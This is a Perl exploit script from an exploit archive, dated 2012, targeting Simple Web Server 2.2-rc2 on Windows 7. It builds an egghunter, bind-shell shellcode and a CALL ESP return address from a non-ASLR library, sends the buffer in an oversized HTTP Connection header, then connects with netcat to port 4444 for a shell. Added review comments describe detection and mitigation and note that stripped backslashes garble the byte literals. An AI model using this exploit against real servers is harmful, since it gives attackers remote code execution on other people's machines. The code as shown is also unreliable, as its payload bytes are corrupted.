# Title : Simple Web Server 2.2-rc2 ASLR Bypass Exploit
# Published : 2012-08-28
# Author :
# Previous Title : Sflog! CMS 1.0 Arbitrary File Upload Vulnerability
# Next Title : SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
use IO::Socket;
# Exploit Title: SWS 2.2-rc2 - Remote code execution Egghunting + ASLR bypass
# Date: 28/8/2012
# Special Regards to Mr.pr0n ,Corelan team , immunity u guys are first !!! based on a POC by MR. Pr0n
# Author: pole
# Tested on Windows 7 32bit
# NOTE : If exploit is not running properly configure the server on other http ports like here i have used #8000 http ... and keep checking the server is "GREEN" enabled !
# Flat exploit script: builds a fixed-size buffer, sends it to an HTTP server
# inside a request header, then connects to TCP/4444 expecting a bind shell.
#
# Review notes (defender's reading of what is visible here):
#  - No `use strict; use warnings;` -- every variable below is a package global.
#  - The `\x`, `\r` and `\n` backslashes appear to have been stripped from this
#    copy (e.g. `"x41"`, `"rn"`), so as written every "byte" literal is plain
#    ASCII text and the string lengths differ from the author's intent.
#  - Detection angle grounded in the code: a single HTTP/1.1 GET whose
#    `Connection:` header value is roughly 2 KB of filler plus a tag, followed
#    shortly by a new inbound connection to port 4444 on the same host.
#  - Mitigation angle grounded in the code: the return address (see $ret) is
#    taken from a module the author marks "Non Aslr"; the technique depends on
#    at least one loaded DLL not being relocated, so every module in the
#    process should be built/loaded with ASLR (and DEP) enabled.
print "Exploit by Dhruval n";
# Exactly two positional arguments are required: target host and TCP port.
if (@ARGV != 2)
{
print "n[-] Usage: $0 <target ip> <port> nn";
exit();
}
$target = $ARGV[0]; # Target IP
$port = $ARGV[1]; # Target port
# Egghunter stub; it scans memory for the doubled 4-byte tag ("w00tw00t",
# see $exploit below) and transfers control to what follows it.
$egghunter =
"x66x81xCAxFFx0Fx42x52x6Ax02".
"x58xCDx2Ex3Cx05x5Ax74xEFxB8".
"w00t". # The 4 byte tag!
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
# MSF windows/shell_bind_tcp LPORT=4444
# Payload that listens on TCP/4444; the `nc $target 4444` call at the end of
# this script is the matching client side.
$shellcode =
"xdaxc5xd9x74x24xf4x2bxc9xbax3ax04xccxb6x5e".
"xb1x56x31x56x19x83xeexfcx03x56x15xd8xf1x30".
"x5ex95xfaxc8x9fxc5x73x2dxaexd7xe0x25x83xe7".
"x63x6bx28x8cx26x98xbbxe0xeexafx0cx4exc9x9e".
"x8dx7fxd5x4dx4dx1exa9x8fx82xc0x90x5fxd7x01".
"xd4x82x18x53x8dxc9x8bx43xbax8cx17x62x6cx9b".
"x28x1cx09x5cxdcx96x10x8dx4dxadx5bx35xe5xe9".
"x7bx44x2axeax40x0fx47xd8x33x8ex81x11xbbxa0".
"xedxfdx82x0cxe0xfcxc3xabx1bx8bx3fxc8xa6x8b".
"xfbxb2x7cx1ex1ex14xf6xb8xfaxa4xdbx5ex88xab".
"x90x15xd6xafx27xfax6cxcbxacxfdxa2x5dxf6xd9".
"x66x05xacx40x3exe3x03x7dx20x4bxfbxdbx2ax7e".
"xe8x5dx71x17xddx53x8axe7x49xe4xf9xd5xd6x5e".
"x96x55x9ex78x61x99xb5x3cxfdx64x36x3cxd7xa2".
"x62x6cx4fx02x0bxe7x8fxabxdexa7xdfx03xb1x07".
"xb0xe3x61xefxdaxebx5ex0fxe5x21xe9x08x2bx11".
"xb9xfex4exa5x2fxa2xc7x43x25x4ax8exdcxd2xa8".
"xf5xd4x45xd3xdfx48xddx43x57x87xd9x6cx68x8d".
"x49xc1xc0x46x1ax09xd5x77x1dx04x7dxf1x25xce".
"xf7x6fxe7x6fx07xbax9fx0cx9ax21x60x5bx87xfd".
"x37x0cx79xf4xd2xa0x20xaexc0x39xb4x89x41xe5".
"x05x17x4bx68x31x33x5bxb4xbax7fx0fx68xedx29".
"xf9xcex47x98x53x98x34x72x34x5dx77x45x42x62".
"x52x33xaaxd2x0bx02xd4xdaxdbx82xadx07x7cx6c".
"x64x8cx8cx27x25xa4x04xeexbfxf5x48x11x6ax39".
"x75x92x9fxc1x82x8axd5xc4xcfx0cx05xb4x40xf9".
"x29x6bx60x28x23";
# Filler sized so that filler + tag + shellcode is exactly 2048 bytes; the
# overwrite target is therefore assumed to sit right after a 2048-byte buffer.
$junk = "x41" x (2048 - length("w00tw00t") - length($shellcode));
# Little-endian 32-bit return address (pack 'V'). The author notes it is a
# CALL ESP gadget in a library loaded without ASLR -- the whole "ASLR bypass"
# is just this one non-randomised module.
$ret = pack('V',0x6FC8E251); # CALL ESP - libstdc++-6.dll Non Aslr
#$ret = pack('V',0x7C82385D); #call ESP
#$ret = pack ('V',0x75560D1B); #call ESP ASLR AWARE :)
$nops = "x90" x 20; # 20 nops.
# Final layout: [filler][tag][shellcode][ret][nops][egghunter].
# CALL ESP lands in the nops, which run into the egghunter, which then
# searches back for the tag and jumps to the shellcode.
$exploit = $junk."w00tw00t".$shellcode.$ret.$nops.$egghunter;
if ($socket = IO::Socket::INET->new
(PeerAddr => $target,
PeerPort => $port,
Proto => "TCP"))
{
# The payload is carried as the value of the `Connection:` header of an
# otherwise ordinary GET; that oversized header is the observable on the wire.
$header =
"GET / HTTP/1.1rn".
"Host: ".$target." rn".
"Connection:".$exploit."rn";
print "n[+] Sending buffer (".(length($exploit))." bytes) to: $target:$port n";
# Trailing "rn" terminates the header block; no body is sent.
print $socket $header."rn";
sleep(1);
close($socket);
print "[+] Exploitation Done!n";
print "[+] Please, wait couple of sec ...n";
sleep(1);
print "[+] Got shell?nn";
# $target comes straight from @ARGV and is interpolated into a shell command
# string; single-arg system() hands it to the shell, so shell metacharacters
# in argv[0] would be interpreted (list-form system() would not).
$command = "nc $target 4444";
system ($command);
}
else
{
print "[-] Connection to $target failed!n";
}